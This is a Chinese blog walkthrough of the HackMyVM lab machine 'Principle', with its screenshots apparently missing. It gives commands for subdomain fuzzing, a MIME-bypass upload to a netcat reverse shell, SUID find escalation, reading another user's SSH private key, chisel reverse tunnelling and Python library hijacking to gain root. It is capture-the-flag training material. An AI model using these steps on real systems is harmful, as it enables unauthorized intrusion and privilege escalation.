hackmyvm_Principle
寻找存活靶机:


看一下web服务

简单的一个nginx欢迎页面
扫到robots.txt

三个路径分别去访问




按照提示去扫目录
扫到



得到子域名T4L0S.HMV
放入hosts文件
去访问

提示我们还有子域
枚举
ffuf -u http://t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 615 |

也加进hosts文件中

证明了我们方向是对的
接下来扫一下目录得到upload.php

改掉MIME类型即可上传根据返回包判断出文件路径
直接nc弹shell即可


suid find提权
find . -exec /bin/sh -p \; -quit |



根据十二神的姓名查找文件
for line in $(cat name.txt); do find / -iname *$line* 2>/dev/null; done |

查看/etc/selinux/Afrodita.key

得到了talos密码

切换用户后发现可以elohim权限用cp
这样我们就可以借助打印缓冲区读取我们想要读取的文件

查看端口开放服务
ss -tlune |

3445有ssh服务但是我们又不能直接访问
所以我们将其流量代理出来之后再用ssh登录
我们找不到gehenna的明文密码但是可以
ssh密钥登陆
私钥一般在
/home/用户名/.ssh/id_rsa
读私钥

然后在将chisel传到靶机上
进行流量代理
./chisel client 192.168.56.103:1475 R:3445:localhost:3445 |

./chisel server --reverse -p 1475 |

ssh -i rsa_principle -p 3445 elohim@localhost |
登陆时发现私钥使用需要输入密码


在.lock文件中找到十六进制密码

有了密码登陆即可


绕过受限 shell
bash --noprofile --norc |

发现root权限脚本
查看脚本内容


查看ssubprocess.py

由于我们属于 sml 组,我们有写入权限,所以一切都指向 python 库劫持。

成功提权到root权限

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 myift!
